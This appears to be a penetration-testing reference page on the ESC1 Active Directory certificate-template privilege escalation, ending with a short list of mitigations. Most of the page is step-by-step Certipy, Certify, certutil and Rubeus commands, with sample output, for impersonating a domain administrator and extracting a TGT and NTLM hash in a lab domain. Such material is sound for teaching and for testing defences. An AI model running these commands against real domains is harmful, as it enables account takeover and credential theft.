ESC1

Description

ESC1 is a privilege escalation vulnerability in certificate templates that allows any user with enrollment rights to supply a subjectAltName (SAN) for any other user or machine in Active Directory in the environment from the Certificate Authority (CA) , this allows the requesting user to receive a certificate for the targeted user and in turn, authenticate as them with the received certificate.

Requirements for attack path

ENROLLEE_SUPPLIES_SUBJECT flag in the certificate template
Enrollment rights granted to a user or group for which we have access to
Manager approval not enabled
Authorized signature are not required

Linux

Enumeration

certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -vulnerable -stdout

Performing the attack

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2  -template 'ESC1' -upn 'administrator@security.local' -sid S-1-5-21-13999771-2333344039-1820745628-500

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 51
[*] Got certificate with UPN 'administrator@security.local'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'

certipy auth -pfx administrator.pfx -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100

[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe

Windows

Enumeration

.\Certify.exe find /vulnerable /enabled /enrolleeSuppliesSubject

Performing the attack

Reuqest a certificate for the template vulnerable to ESC1 and specify a SAN for the user we wish to compromise (/altname:).

For accuracy and to avoid certificate mismatch issues we should always aim to provide the /sid parameter which should be the value of the UPN we are targeting (administrator@security.local in the example below).

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC1 /altname:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500

Take the private key and certificate output and place them into seperate files.

cert.key

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----

cert.pem

-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\cert.pem .\cert.pfx

Use the converted certificate file with Rubeus to either request a NTLM hash or a Kerberos TGT.

# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials

# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap

< -- Snip -->

  ServiceName              :  krbtgt/security
  ServiceRealm             :  SECURITY.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  SECURITY.LOCAL
  StartTime                :  05/03/2025 18:06:36
  EndTime                  :  06/03/2025 04:06:36
  RenewTill                :  12/03/2025 18:06:36
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  CpuuZvtyqrp9XO0V1OL/kg==
  ASREP (key)              :  E7A981462C4B5115AB41BE5540D573E6

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 2B576ACBE6BCFDA7294D6BD18041B8FE

Mitigations

Remove the ENROLLEE_SUPPLIES_SUBJECT flag from the certificate
Require manager aprovals on the certificate
Require authorized signatures
Remove weak enrollement permissions from the template

Last updated 9 months ago